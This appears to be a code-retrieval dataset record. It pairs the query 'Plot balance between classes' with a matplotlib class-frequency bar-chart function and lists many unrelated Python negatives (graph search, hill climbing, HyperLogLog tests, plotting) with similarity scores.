= [[] for l in Alist]\n\n Alen = len(Alist) #length of Alist\n dinits = [dinit]*Alen #list of airport indexes\n Udict = dict(zip(list(range(Alen)),dinits)) #zip into dictionary\n Udict[s] = 0\n path[s] = [s]\n \n #Main search\n while len(Udict)>0:\n #Find node with min d in Udict and move to Edict\n dmin = dinit\n for n,w in Udict.items():\n if w<dmin:\n dmin=w\n nmin=n\n Edict[nmin] = Udict.pop(nmin)\n print(\"moved node\", nmin)\n\n #Update provisional distances for unexplored neighbors of nmin\n \n #for n,w in G.adj[nmin].items():\n for item in Alist[nmin]: #nminth element is a list of two element tuples (node, weight)\n n = item[0] #first elt of tuple is node/neighbour\n w = item[1] #2nd elt is density/weigh\n #for n,w in etc_______________________-\n \n if n in Edict:\n pass\n elif n in Udict:\n #dcomp = dmin + w\n dcomp = max(w,dmin) #take largest value to record most dangerous segment\n if dcomp<Udict[n]:\n print(Udict)\n Udict[n]=dcomp\n path[n] = path[nmin] + [n]\n #path[n].extend(path[nmin])\n #path[n] = path[nmin]\n \n #path[n].append(n) #n not nmin\n print(path)\n # else:\n #dcomp = dmin + w\n # dcomp = max(w,dmin)\n # Udict[n] = dcomp\n #path[n].extend(path[nmin])\n #path[n].append(nmin) \n \n if nmin == d: #if current node is destination\n return path[d],Edict[d]\n return [] #no path", "def solve(problem):\n\n # *** YOUR CODE HERE ***\n\n # The core of Iterative Deepening Search are iterations of Depth Limited\n # Search with given increasing depth.\n\n # A recursive version of Depth Limited Search\n def depth_limited_search(problem, limit):\n \"\"\"\n Return a list of nodes we traversed (or None).\n 
:param problem: the starting set up.\n :param limit: a given numeric depth limit.\n :return: a list of nodes.\n \"\"\"\n\n # in this case, we simply use a list to keep track of nodes we\n # traversed, instead of the data structure, Stack.\n path = list()\n visited = set() # as before, to prevent duplicated nodes\n root = problem.get_initial_state()\n\n def rec_dls(state, action, depth):\n\n visited.add(state)\n\n # if it is a goal\n if problem.goal_test(state):\n path.append((state, action))\n return path\n\n # or if it reaches a certain depth, but not a goal\n elif depth == 0:\n visited.remove(state)\n return None\n\n else:\n path.append([state, action])\n for successor, action, cost in problem.get_successors(state):\n if successor not in visited:\n # recursively expands the deepest node\n res = rec_dls(successor, action, depth-1)\n if res is not None:\n return res\n path.pop()\n visited.remove(state)\n\n # \"Stared From the Bottom\" (root)\n result = rec_dls(root, 'None', limit)\n # return the path if the we DID have achieved something\n if result is not None:\n return path\n\n import sys\n for depth in range(sys.maxsize): # depth from 0 to infinity\n print(\"Lower-bound of the optimal cost is {}\".format(depth))\n res2 = depth_limited_search(problem, depth)\n if res2 is not None:\n action_list = list()\n for move in res2:\n action_list.append(move[1]) # recall index 0 is the parent\n # do not forget a None returned in iteration 0 (with depth 0)\n action_list.remove('None')\n return action_list", "def test_hmaps(self):\n #Merging and adding, with commutativity, without collision\n hll1 = HyperLogLog(250)\n hll1.extend(self.data)\n hll2 = HyperLogLog(250)\n hll2.extend(self.num_data)\n test_set = set(non_zero_idx_val(hll1.hmap)).union(\n set(non_zero_idx_val(hll2.hmap)))\n hll1_prime = HyperLogLog(250) #merging\n hll1_prime.extend(self.data)\n hll1_prime.merge(hll2)\n assert set(non_zero_idx_val(hll1_prime.hmap)) == test_set\n hll2_prime = HyperLogLog(250) #merging commutativity\n hll2_prime.extend(self.num_data)\n hll2_prime.merge(hll1)\n assert set(non_zero_idx_val(hll2_prime.hmap)) == test_set\n hll3 = hll1 + hll2 #addition\n assert set(non_zero_idx_val(hll3.hmap)) == test_set\n hll4 = hll2 + hll1 #addition commutativity\n assert set(non_zero_idx_val(hll4.hmap)) == test_set\n \n #Collision testing\n hll1 = HyperLogLog(250)\n hll1.append(self.colliding_data[0])\n hll2 = HyperLogLog(250)\n hll2.append(self.colliding_data[1])\n hll1_prime = HyperLogLog(250)\n hll1_prime.append(self.colliding_data[0])\n hll1_prime.merge(hll2)\n assert hll1_prime.hmap[0] == 2\n hll2_prime = HyperLogLog(250)\n hll2_prime.append(self.colliding_data[1])\n hll2_prime.merge(hll2)\n assert hll2_prime.hmap[0] == 2\n assert (hll1 + hll2).hmap[0] == 2\n assert (hll2 + hll1).hmap[0] == 2", "def fn(i):\n if i == 0: return 1 # boundary condition \n ans = 0\n for k in range(1, N+1): \n if k not in seen and (k%i == 0 or i%k == 0): \n seen.add(k)\n ans += fn(i-1)\n seen.remove(k)\n return ans", "def solution(n: int = 2000000) -> int:\n\n return sum(takewhile(lambda x: x < n, prime_generator()))", "def customBreadthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n i = 0\n dirList = []\n closed = util.Counter()\n fringe = util.Queue()\n state = problem.getStartState()\n followPac = []\n closed[hash(state)] = 1\n\n for triple in problem.getSuccessors(state):\n fringe.push((triple, dirList.copy()))\n while not fringe.isEmpty():\n i += 1\n state = fringe.pop()\n succ = state[0][0]\n act = state[0][1]\n cost = state[0][2]\n 
dirList = state[1]\n dirList.append(act)\n \n if problem.isGoalState(succ):\n return dirList\n if problem.isPacman(succ):\n followPac.append(dirList.copy())\n if closed[hash(succ)] == 0:\n closed[hash(succ)] = 1\n for triple in problem.getSuccessors(succ):\n fringe.push((triple, dirList.copy()))\n if not followPac:\n return\n followPac = max(followPac, key=lambda x: len(x))\n last = followPac.pop()\n followPac.append(last)\n followPac.append('place')\n followPac.append(reverse[last])\n return followPac.copy()", "def fn(n, k):\n if n == k: return 1\n if k == 0: return 0\n return ((n-1)*fn(n-1, k) + fn(n-1, k-1)) % 1_000_000_007", "def minimumEffortPath(self, heights: List[List[int]]) -> int:\n m, n = len(heights), len(heights[0])\n\n def diff(i, j, _i, _j):\n return abs(heights[i][j] - heights[_i][_j])\n\n max_diff = 0\n for i in range(m):\n for j in range(n):\n for dx, dy in [(-1, 0), (1, 0), (0, -1), (0, 1)]:\n _i, _j = i+dx, j+dy\n if 0<=_i<m and 0<=_j<n:\n max_diff = max(max_diff, diff(i, j, _i, _j))\n\n @lru_cache(None)\n def dfs(i, j, remain, k):\n if i == m-1 and j == n-1:\n return True\n for dx, dy in [(-1, 0), (1, 0), (0, -1), (0, 1)]:\n _i, _j = i+dx, j+dy\n if 0<=_i<m and 0<=_j<n:\n bit = 1<<(_i*n + _j)\n if remain&bit and diff(i, j, _i, _j) <= k:\n if dfs(_i, _j, remain^bit, k):\n return True\n return False\n\n def bisearch(s, e, func):\n while s <= e:\n p = s + (e-s)//2\n if func(p):\n e = p-1\n else:\n s = p+1\n return e+1\n\n return bisearch(0, max_diff, lambda k: dfs(0, 0, (1<<(m*n))-1, k))", "def manhattan_heuristic(state):\n man_h = 0\n size = len(state)\n for i in range (size):\n for j in range (size):\n if state[i][j] == 0:\n continue\n else:\n man_h = man_h + abs(i - int(state[i][j]/3)) + abs(j - (state[i][j])%3)\n return man_h", "def q3(array):\n a = array[1]\n b = array[6]\n c = array[11]\n d = array[12]\n a1 = roll(a, 00) + roll(b, 00) + roll(b, 12) + roll(c, 12) + roll(d, 28) + roll(a, 28) + roll(b, 28)\n b1 = roll(b, 19) + roll(c, 19) + roll(d, 3) + roll(a, 3) + roll(b, 3) + roll(c, 7) + roll(d, 23) + roll(a,\n 23) + roll(\n b, 23) + roll(a, 15) + roll(b, 15) + roll(b, 27) + roll(c, 27) + roll(d, 11) + roll(a, 11) + roll(b, 11) + roll(\n d, 31) + roll(a, 31) + roll(b, 31)\n c1 = roll(c, 0) + roll(d, 16) + roll(a, 16) + roll(b, 16) + roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c,\n 20) + roll(\n d, 4) + roll(a, 4) + roll(b, 4) + roll(d, 24) + roll(a, 24) + roll(b, 24)\n d1 = roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c, 20) + roll(d, 4) + roll(a, 4) + roll(b, 4) + roll(d,\n 24) + roll(a,\n 24) + roll(\n b, 24)\n\n return array[0], a1, array[2], array[3], array[4], array[5], b1, array[7], array[8], array[9], array[10], c1, d1, \\\n array[\n 13], array[14], array[15]", "def part2(problem_input: Iterable[str]) -> int:\n height_map = [[int(n) for n in s.strip()] for s in problem_input]\n\n def view_north(x: int, y: int) -> int:\n if y == 0:\n return 0\n v = 0\n for yy in range(y - 1, -1, -1):\n v += 1\n if height_map[yy][x] >= height_map[y][x]:\n break\n return v\n\n def view_south(x: int, y: int) -> int:\n if y == len(height_map) - 1:\n return 0\n v = 0\n for yy in range(y + 1, len(height_map)):\n v += 1\n if height_map[yy][x] >= height_map[y][x]:\n break\n return v\n\n def view_west(x: int, y: int) -> int:\n if x == 0:\n return 0\n v = 0\n for xx in range(x - 1, -1, -1):\n v += 1\n if height_map[y][xx] >= height_map[y][x]:\n break\n return v\n\n def view_east(x: int, y: int) -> int:\n if x == len(height_map[0]):\n return 0\n v = 0\n for xx in range(x + 1, 
len(height_map[0])):\n v += 1\n if height_map[y][xx] >= height_map[y][x]:\n break\n return v\n\n return max(\n view_north(x, y) * view_south(x, y) * view_west(x, y) * view_east(x, y)\n for x in range(len(height_map[0]))\n for y in range(len(height_map))\n )", "def griewank(x):\n nopt = np.size(x)\n # if (nopt == 2) | (nopt == 10):\n xx = x\n if nopt == 2:\n d = 200.0\n else:\n d = 4000.0\n\n u1 = 0.0\n u2 = 1.0\n for j in range(nopt):\n u1 = u1 + xx[j]**2 / d\n u2 = u2 * np.cos(xx[j] / np.sqrt(float(j + 1)))\n\n f = u1 - u2 + 1\n return f", "def fastestWay( a, t, e, x, n ):\n import pdb;pdb.set_trace() \n f1.append( ( e[0] , 1 ) )\n f2.append( ( e[1] , 2 ) )\n for i in xrange(n):\n f11 = f1[i][0]+a[0][i]\n f12 = f2[i][0]+a[1][i]+t[1][i+1]\n f22 = f2[i][0]+a[1][i]\n f21 = f1[i][0]+a[0][i]+t[0][i+1]\n\n f1.append( ( min( f11, f12 ), 1 ) if f11 < f12 else ( min( f11, f12 ), 2 ) )\n f2.append( ( min( f21, f22 ), 2 ) if f22 < f21 else ( min( f22, f21 ), 1 ) )\n\n f1x, f2x = f1[n][0]+x[0], f2[n][0]+x[1] \n return ( min( f1x, f2x ) , f1 ) if f1x < f2x else ( min( f1x, f2x ), f2 )", "def solver2(input_val):\n sum_div = [1] * (input_val + 1)\n for i in range(2, int(input_val ** 0.5) + 1):\n sum_div[i * i] += i\n for k in range(i + 1, input_val // i + 1):\n sum_div[k * i] += k + i\n\n abundants, result = set(), 0\n for n in range(1, input_val + 1):\n if sum_div[n] > n:\n abundants.add(n)\n if not any((n - a in abundants) for a in abundants):\n result += n\n return result", "def test_sw2():\n B1 = 100\n B2 = 200\n h = 18\n t = 1\n H = h + 2 * t\n E1 = 20000\n E2 = 10000\n sections = ((B1, t, 0, E1), (B2, t, h + t, E2))\n EI, top, bot = bm.EI(sections, E1)\n EIc = E1 * B1 * (H ** 3 - h ** 3) / 12\n assert 0.99 < EI / EIc < 1.01", "def hill_climbing(\n search_prob,\n find_max: bool = True,\n max_x: float = math.inf,\n min_x: float = -math.inf,\n max_y: float = math.inf,\n min_y: float = -math.inf,\n visualization: bool = False,\n max_iter: int = 10000,\n) -> SearchProblem:\n current_state = search_prob\n scores = [] # list to store the current score at each iteration\n iterations = 0\n solution_found = False\n visited = set()\n while not solution_found and iterations < max_iter:\n visited.add(current_state)\n iterations += 1\n current_score = current_state.score()\n scores.append(current_score)\n neighbors = current_state.get_neighbors()\n max_change = -math.inf\n min_change = math.inf\n next_state = None # to hold the next best neighbor\n for neighbor in neighbors:\n if neighbor in visited:\n continue # do not want to visit the same state again\n if (\n neighbor.x > max_x\n or neighbor.x < min_x\n or neighbor.y > max_y\n or neighbor.y < min_y\n ):\n continue # neighbor outside our bounds\n change = neighbor.score() - current_score\n if find_max: # finding max\n # going to direction with greatest ascent\n if change > max_change and change > 0:\n max_change = change\n next_state = neighbor\n else: # finding min\n # to direction with greatest descent\n if change < min_change and change < 0:\n min_change = change\n next_state = neighbor\n if next_state is not None:\n # we found at least one neighbor which improved the current state\n current_state = next_state\n else:\n # since we have no neighbor that improves the solution we stop the search\n solution_found = True\n\n if visualization:\n from matplotlib import pyplot as plt\n\n plt.plot(range(iterations), scores)\n plt.xlabel(\"Iterations\")\n plt.ylabel(\"Function values\")\n plt.show()\n\n return current_state", "def hillclimber_greedy(grid):\n\n # 
set swap to true to start the loop\n swap = True\n\n # loops until no swaps can be made\n while swap == True:\n # sets swap to false\n swap = False\n # loops through the batteries\n for b1 in grid.batteries:\n # loops through the houses in the batteries\n for h1 in b1.routes:\n # loops through the batteries\n for b2 in grid.batteries:\n # loops through the houses in the batteries\n for h2 in b2.routes:\n b1cap = h1.house.max_output + b1.current_capacity\n b2cap = h2.house.max_output + b2.current_capacity\n # checks if a swap between two houses can be made\n if h1.house.max_output < b2cap and h2.house.max_output < b1cap:\n # calculate is the swap improves the length of the connections\n len_new = distance(h1.house.location, b2.location) + distance(h2.house.location, b1.location)\n len_old = h1.length + h2.length\n\n # makes the swap if the length is improved\n if swap == False and len_new < len_old and h1.house.id != h2.house.id:\n swap = grid.swap(h1, h2)\n break\n return grid" ]
[ "0.6305694", "0.58596754", "0.5824617", "0.57462597", "0.5715227", "0.5684032", "0.56557304", "0.5591559", "0.5554532", "0.55386126", "0.5528498", "0.55246407", "0.5522697", "0.5501514", "0.5486631", "0.5482586", "0.54730695", "0.546426", "0.5456875", "0.5453615", "0.5421071", "0.54138774", "0.5413025", "0.5411192", "0.5408681", "0.54044694", "0.5395705", "0.5378931", "0.53784275", "0.53783035", "0.53772205", "0.5369596", "0.53693897", "0.53642887", "0.536011", "0.535824", "0.53497976", "0.5346345", "0.53360504", "0.5327385", "0.53265274", "0.53264254", "0.53137577", "0.5312222", "0.53112066", "0.53044534", "0.5304016", "0.5298993", "0.5298683", "0.5295499", "0.5294324", "0.5292674", "0.52920914", "0.5291429", "0.5290665", "0.52829117", "0.52827394", "0.5274343", "0.5272141", "0.5271538", "0.527119", "0.5269481", "0.5263044", "0.52613586", "0.5259244", "0.52538794", "0.5245598", "0.5245186", "0.5241252", "0.5237461", "0.5230675", "0.52304506", "0.522292", "0.5218323", "0.52180856", "0.5212351", "0.5212276", "0.52095544", "0.5202756", "0.5202478", "0.51993436", "0.5197185", "0.51965076", "0.5195096", "0.51924217", "0.51912713", "0.5188517", "0.51836574", "0.5183047", "0.5182782", "0.5177266", "0.5176249", "0.5164175", "0.5163037", "0.5160942", "0.5157797", "0.51481354", "0.51467425", "0.51413804", "0.5139445" ]
0.5833218
2
Plot balance between classes
def plot_balance_class(classes):
    unique, counts = np.unique(classes, return_counts=True)
    plt.bar(unique, counts)
    plt.title('Class Frequency')
    plt.xlabel('Class')
    plt.ylabel('Frequency')
    plt.show()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def show_class_imbalance(df, title='Class Imbalance', PATH=None):\n ax = sns.barplot(x=[\"Normal\", \"Clickbait\"], y=df.groupby(['target']).target.count())\n ax.set_title(title, size=20)\n plt.xticks([0,1],[\"Normal\", \"Clickbait\"], size = 20)\n ax.set_ylabel(\"Document Count\", size=17)\n ax.set_xlabel(\"Article Class\", size=20)\n if PATH:\n plt.savefig(PATH, bbox_inches=\"tight\", transparent=True)\n return ax", "def plot_class_balances(df, col):\n\n ser_counts = df[col].value_counts()\n ser_counts.plot.bar()\n plt.title(col + ' Counts \\n(classes={})'.format(ser_counts.shape[0]))\n \n plt.show()", "def plot(self):\n\t\traw_labels = self.make_raw_data()[1]\n\t\tbalanced_labels = self.get_extra()[1]\n\t\tfig, ax1 = subplots()\n\t\tax2 = ax1.twinx()\n\t\tx = array(range(1, NCLASSES + 1))\n\t\tl1 = ax1.bar(x - 0.3, self.prior_sizes, width = 0.25, color = 'b', align = 'center', label = 'train')\n\t\tl2 = ax2.bar(x, bincount(raw_labels - 1), width = 0.25, color = 'r', align = 'center', label = 'confident')\n\t\tl3 = ax2.bar(x + 0.3, bincount(balanced_labels - 1), width = 0.25, color = 'g', align = 'center', label = 'rebalanced')\n\t\tconfident_frac = len(raw_labels) / float(self.predictions.shape[0])\n\t\tusable_frac = len(balanced_labels) / float(self.predictions.shape[0])\n\t\tax1.set_title('at >{0:.1f}%, {1:.1f}% reliable, {2:.1f}% usable'.format(self.confidence * 100, confident_frac * 100, usable_frac * 100))\n\t\tax1.legend([l1, l2, l3], [l1.get_label(), l2.get_label(), l3.get_label()], loc = 'upper right')\n\t\tax1.set_xticks(x)", "def plot_balancer_results_per_classifier(data_balancer_results_per_classifier, parameter=(2, \"Balanced Accuracy\")):\n classifier_arr = []\n color = iter(cm.Set1(np.linspace(0, 1, len(data_balancer_results_per_classifier) + 1)))\n mean_classifier_arr = [0] * len(data_balancer_results_per_classifier[0][1])\n for (classifier_name, data_balancer_results) in data_balancer_results_per_classifier:\n individual_data_balance_plot = []\n x = 0\n for (data_balancer_name, result_arr) in data_balancer_results:\n individual_data_balance_plot.append(result_arr[parameter[0]]) # Average True rate\n mean_classifier_arr[x] += result_arr[parameter[0]]\n x += 1\n classifier_arr.append(individual_data_balance_plot)\n\n classifier_arr.append([value / float(len(data_balancer_results_per_classifier)) for value in mean_classifier_arr])\n\n fig = plt.figure(figsize=(12, 10))\n\n classifiers = np.arange(len(classifier_arr))\n data_balancers = np.arange(len(classifier_arr[0])) * 3\n bar_width = 0.2\n opacity = 0.9\n\n for i in range(len(classifier_arr)):\n if i + 1 != len(classifier_arr):\n label = data_balancer_results_per_classifier[i][0]\n else:\n label = \"Mean classification\"\n\n plt.bar(data_balancers + (i * bar_width), classifier_arr[i], bar_width,\n alpha=opacity,\n color=color.next(),\n label=label)\n\n plt.locator_params(axis='y', nbins=10)\n plt.xlabel(\"Data balance algorithm\")\n plt.ylabel(parameter[1])\n plt.legend(loc=\"lower right\", fancybox=True, frameon=True)\n plt.title(\"{0} per data balance algorithm\".format(parameter[1]))\n plt.ylim([0.0, 1.00])\n data_balance_labels = [filter(str.isupper, data_balance_name) if data_balance_name != \"None\" and len(filter(str.isupper, data_balance_name)) < 6 else data_balance_name for\n (data_balance_name, _) in data_balancer_results_per_classifier[0][1]]\n plt.xticks(data_balancers + (bar_width / 2) * len(classifiers), data_balance_labels)\n\n current_time = datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\n 
plt.savefig(os.path.dirname(os.path.realpath(__file__)) + \"/../results/data_balancer_results_per_classifier_plot_{0}_{1}.png\".format(parameter[1], current_time))\n plt.close(fig)", "def plot_model_rates(class_name, model, ax):\n true_positives, totals = model.range_metrics[class_name]\n prob_rates = model.class_prob_rates[class_name]\n\n bins = np.arange(5)\n\n # color bars based on freq.\n # norm = plt.Normalize(0, max(totals))\n # colors = mpl.cm.Blues(norm(totals))\n\n ax.bar(bins, prob_rates, color=P_BAR_COLOR, edgecolor=BAR_EDGE_COLOR)\n ax.set_ylim(0, 1)\n for axis in ['top', 'bottom', 'left', 'right']:\n ax.spines[axis].set_linewidth(1.5)\n\n index = 0\n\n for xy in zip(np.arange(5), prob_rates):\n # Get class count of current index\n count = str(totals[index])\n loc = list(xy)\n # lower annotation, so its not out of the plot for large bars\n if loc[1] > .9:\n xy = tuple([loc[0], loc[1] - .1])\n y_val = xy[1]\n ax.annotate(count, xy=xy, textcoords='data', ha='center',\n va='bottom', fontsize=8)\n index += 1", "def test_multiclass_balance(self):\n dataset = make_fixture(binary=False, split=False)\n\n oz = ClassBalance()\n assert oz.fit(dataset.y) is oz\n assert oz._mode == BALANCE\n\n # oz.finalize()\n self.assert_images_similar(oz)", "def show_learning_curve(self):\n\n # Loop output classes\n for c in range(1,self.n_output_classes):\n # Get data\n x_values = np.array(self.n_class_samples_list[c])\n accuracy = np.array(self.accuracy_list[c])\n precision = np.array(self.precision_list[c])\n recall = np.array(self.recall_list[c])\n F1 = np.array(self.F1_list[c])\n\n # Make plot\n with sns.axes_style(\"ticks\"):\n fig,ax = plt.subplots()\n plt.plot([np.min(x_values),np.max(x_values)],[0.5,0.5],\n color='#777777',linestyle='--')\n plt.plot([np.min(x_values),np.max(x_values)],[0.66,0.66],\n color='#777777',linestyle=':')\n plt.plot([np.min(x_values),np.max(x_values)],[0.8,0.8],\n color='#777777',linestyle=':')\n plt.plot([np.min(x_values),np.max(x_values)],[0.9,0.9],\n color='#777777',linestyle=':')\n\n plt.plot( x_values, accuracy, color='#000000',\n linewidth=1, label='Accuracy' )\n plt.plot( x_values, precision, color='#0000aa',\n linewidth=1, label='Precision' )\n plt.plot( x_values, recall, color='#00aa00',\n linewidth=1, label='Recall' )\n plt.plot( x_values, F1, color='#aa0000',\n linewidth=2, label='F1' )\n\n plt.yticks( [0, 0.5, 0.66, 0.8, 0.9, 1.0],\n ['0','0.5','0.66','0.8','0.9','1.0'], ha='right' )\n plt.xlim(np.max(x_values)*-0.02,np.max(x_values)*1.02)\n plt.ylim(-0.02,1.02)\n plt.xlabel('Number of training samples')\n plt.ylabel('Performance')\n plt.title('Learning curve, class {}'.format(c))\n sns.despine(ax=ax, offset=0, trim=True)\n lgnd = plt.legend(loc=4, ncol=1, frameon=True, fontsize=9)\n lgnd.get_frame().set_facecolor('#ffffff')\n ax.spines['left'].set_bounds(0,1)\n ax.spines['bottom'].set_bounds(np.min(x_values),np.max(x_values))", "def plot_progress(self):\n plt.plot(-self.training_average_reward, label='negative average reward')\n plt.plot(self.training_average_electricity_cost_in_euros, label='electricity cost in euros')\n plt.legend()\n plt.xlabel('Epoch')\n plt.ylabel('cost in euros')\n plt.title('Average electricity cost in euros and reward')\n plt.show()", "def plot_data(self, classA, classB):\n plt.scatter(classA[:,0], classA[:,1], color='cyan', alpha=0.7, s=7)\n plt.scatter(classB[:,0], classB[:,1], color='purple', alpha=0.7, s=7)\n plt.axis('tight')\n plt.show()", "def visualize_confidence_level(prediction_proba):\n data = 
(prediction_proba[0]*100).round(2)\n grad_percentage = pd.DataFrame(data = data,columns = ['Porcentage'],index = ['Est','Int','Int_Est','Rob','Rob_Est','Rob_Int','Rob_Int_Est'])\n ax = grad_percentage.plot(kind='barh', figsize=(7, 4), color='#0067e7', zorder=10, width=0.8)\n ax.legend().set_visible(False)\n ax.set_xlim(xmin=0, xmax=100)\n \n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.spines['left'].set_visible(True)\n ax.spines['bottom'].set_visible(True)\n\n ax.tick_params(axis=\"both\", which=\"both\", bottom=\"off\", top=\"off\", labelbottom=\"on\", left=\"off\", right=\"off\", labelleft=\"on\")\n \n vals = ax.get_xticks()\n for tick in vals:\n ax.axvline(x=tick, linestyle='dashed', alpha=0.4, color='#eeeeee', zorder=1)\n\n ax.set_xlabel(\" Porcentage(%) Nivel de confianza\", labelpad=2, weight='bold', size=12)\n ax.set_ylabel(\"Victimización\", labelpad=10, weight='bold', size=12)\n ax.set_title('Nivel de confianza de la predicción ', fontdict=None, loc='center', pad=None, weight='bold')\n\n st.pyplot()\n \n return", "def test_quick_method(self):\n dataset = make_fixture(binary=False, split=False)\n\n viz = class_balance(dataset.y, show=False)\n\n assert isinstance(viz, ClassBalance)\n self.assert_images_similar(viz, tol=0.5)", "def plot(self):\n # plot the data for checking\n fig, [[ax1,ax2],[ax3,ax4], [ax5,ax6]] = plt.subplots(\n 3,2, figsize=(10,8))\n\n # Relative height\n self.board_reference.plot(\n column='z_reference', cmap='GnBu_r', legend=True, ax=ax1)\n self.board_intervention.plot(\n column='z_reference', cmap='GnBu_r', legend=True, ax=ax2)\n\n # Landuse\n self.board_reference.plot(\n column='landuse', legend=True, ax=ax3, cmap='viridis',\n scheme='equal_interval', k=11)\n self.board_intervention.plot(\n column='landuse', legend=True, ax=ax4, cmap='viridis',\n scheme='equal_interval', k=11)\n\n index = np.arange(7)\n xticks = self.PotTax_reference.index.values\n bar_width = 0.3\n\n # plot the initial and new situation comparison\n label = (\"reference: \" +\n str(round(self.PotTax_reference.sum().TFI, 2)))\n reference = ax5.bar(\n index, self.PotTax_reference.values.flatten(), bar_width,\n label=label, tick_label=xticks)\n label = (\"intervention: \" +\n str(round(self.PotTax_intervention.sum().TFI, 2)))\n intervention = ax5.bar(\n index+bar_width, self.PotTax_intervention.values.flatten(),\n bar_width, label=label, tick_label=xticks)\n ax5.set_ylabel(\"total value\")\n ax5.legend(loc='best')\n for tick in ax5.get_xticklabels():\n tick.set_rotation(90)\n\n # plot the percentage increase/decrease between the initial and new\n # situation\n data = self.PotTax_percentage.values.flatten()\n percentage = ax6.bar(\n index, data, bar_width, label=\"percentage\", tick_label=xticks)\n ax6.set_ylabel(\"increase (%)\")\n minimum = min(data)\n maximum = max(data)\n size = len(str(int(round(maximum))))\n maximum = int(str(maximum)[:1])\n maximum = (maximum + 1) * (10**(size-1))\n ax6.set_ylim([min(0, minimum), maximum])\n for tick in ax6.get_xticklabels():\n tick.set_rotation(90)", "def test_quick_method_with_splits(self):\n dataset = make_fixture(binary=False, split=True)\n\n viz = class_balance(dataset.y.train, dataset.y.test, show=False)\n\n assert isinstance(viz, ClassBalance)\n self.assert_images_similar(viz)", "def plot_scenario_distribution(self):\n x = self.arms\n\n y = self.df.groupby('price').mean().Converted[x]\n y_sex_0 = self.df[self.df.Sex == 0].groupby('price').mean().Converted[x]\n y_sex_1 = self.df[self.df.Sex == 
1].groupby('price').mean().Converted[x]\n y_age_0 = self.df[self.df.Under_30 == 0].groupby('price').mean().Converted[x]\n y_age_1 = self.df[self.df.Under_30 == 1].groupby('price').mean().Converted[x]\n\n fig, ax_list = plt.subplots(2,1, figsize=(12, 9))\n\n for ax in ax_list:\n ax.grid(alpha=0.3, linestyle='--')\n\n ax.set_ylim(bottom=0, top=0.6)\n ax.set_xlim(left=50, right=104)\n\n ax.set_xlabel(\"Price\", fontsize=14)\n ax.set_ylabel(\"Conversion Rate\", fontsize=14)\n\n ax.set_xticks(self.arms)\n ax.set_xticklabels(self.arms.astype(np.int64), fontsize=12, alpha=0.7)\n ax.set_yticks(np.linspace(0, 0.7, 8))\n ax.set_yticklabels([str((i * 100).astype(np.int64)) + \"%\" for i in np.linspace(0, 0.7, 8)], fontsize=12, alpha=0.7)\n\n ax.spines['right'].set_alpha(0)\n ax.spines['left'].set_alpha(0.3)\n ax.spines['top'].set_alpha(0)\n ax.spines['bottom'].set_alpha(0.3)\n\n ax_list[0].plot(x, y, label='Global')\n ax_list[0].plot(x, y_sex_0, label='Male', color='moccasin')\n ax_list[0].plot(x, y_sex_1, label='Female', color='darkorange')\n\n ax_list[1].plot(x, y, label='Global')\n ax_list[1].plot(x, y_age_0, label='Under 30', color='red')\n ax_list[1].plot(x, y_age_1, label='Over 30', color='darkred')\n\n ax_list[0].legend()\n ax_list[1].legend()\n\n fig.suptitle(\"Conversion Rate\", fontsize=22)\n\n fig.show()\n\n plt.savefig('chapter5_pricing.png')", "def visualise_dataset_balancer_results(results, range=(-0.5, 0.5),\n colors=(\"#64B3DE\", \"#1f78b4\", \"#B9B914\", \"#FBAC44\", \"#bc1659\", \"#33a02c\", \"grey\", \"#b15928\", \"#6a3d9a\", \"#e31a1c\", \"#6ABF20\", \"#ff7f00\", \"#6a3d9a\"),\n exclude=(\"SVM (linear)\", \"Logistic regression\", \"Random forest\")):\n current_time = datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\n file_name = \"raw_dump_{0}.txt\".format(current_time)\n with open(os.path.dirname(os.path.realpath(__file__)) + \"/../results/\" + file_name, \"wb\") as output_file:\n output_file.write(str(results))\n sns.set(style='ticks')\n fig = plt.figure(figsize=(10, 8))\n ax = fig.add_subplot(1, 1, 1)\n markers = [\"s\", \"d\", \"o\", \"^\", \"*\"]\n size = [150, 200, 200, 200, 250]\n hatches = [None, \"////\", \"..\"]\n\n # Move left y-axis and bottom x-axis to centre, passing through (0,0)\n ax.spines['left'].set_position('center')\n ax.spines['bottom'].set_position((\"axes\", 0.5))\n\n # Eliminate upper and right axes\n ax.spines['right'].set_color('none')\n ax.spines['top'].set_color('none')\n\n # Show ticks in the left and lower axes only\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n ax.set_axis_on()\n ax.spines['left'].set_color('black')\n ax.spines['bottom'].set_color('black')\n plt.xlabel(\"Change in TPR\")\n plt.ylabel(\"Change in TNR\")\n\n ax.xaxis.set_label_coords(0.1, 0.53)\n ax.yaxis.set_label_coords(0.53, 0.9)\n\n plt.ylim(range[0], range[1])\n plt.xlim(range[0], range[1])\n balancer_labels = ([], [])\n classifier_labels = ([], [])\n data_set_index = 0\n for (data_set, dataset_result) in results:\n\n none_true_pos_per_classifier = {}\n none_true_neg_per_classifier = {}\n\n for (classifier_description, result_arr) in dataset_result:\n for (balancer_description, results) in result_arr:\n if balancer_description == \"None\":\n none_true_pos_per_classifier[classifier_description] = results[3]\n none_true_neg_per_classifier[classifier_description] = results[4]\n break\n\n i = 0\n for (classifier_description, result_arr) in dataset_result:\n if classifier_description in exclude:\n continue\n balancer_index = 0\n for 
(balancer_description, results) in result_arr:\n if balancer_description != \"None\":\n if data_set_index == 0 and balancer_index == 0:\n classifier_labels[0].append(mpatches.Patch(color=colors[i], label=classifier_description, alpha=0.8))\n classifier_labels[1].append(classifier_description)\n ax.scatter(results[3] - none_true_pos_per_classifier[classifier_description], results[4] - none_true_neg_per_classifier[classifier_description],\n marker=markers[balancer_index % len(markers)], hatch=hatches[balancer_index % len(hatches)], s=size[balancer_index % len(markers)], alpha=0.8, color=colors[i],\n edgecolor=\"black\" if colors[i] != \"black\" else \"grey\", zorder=balancer_index % len(markers), lw=0.8)\n # Work around to get legend entries correct\n pt = ax.scatter(-99999999999, -9999999999, marker=markers[balancer_index % len(markers)], hatch=hatches[balancer_index % len(hatches)], s=200, alpha=0.8, color=\"white\",\n edgecolor=\"black\", zorder=data_set_index, lw=0.8)\n if i == 0:\n 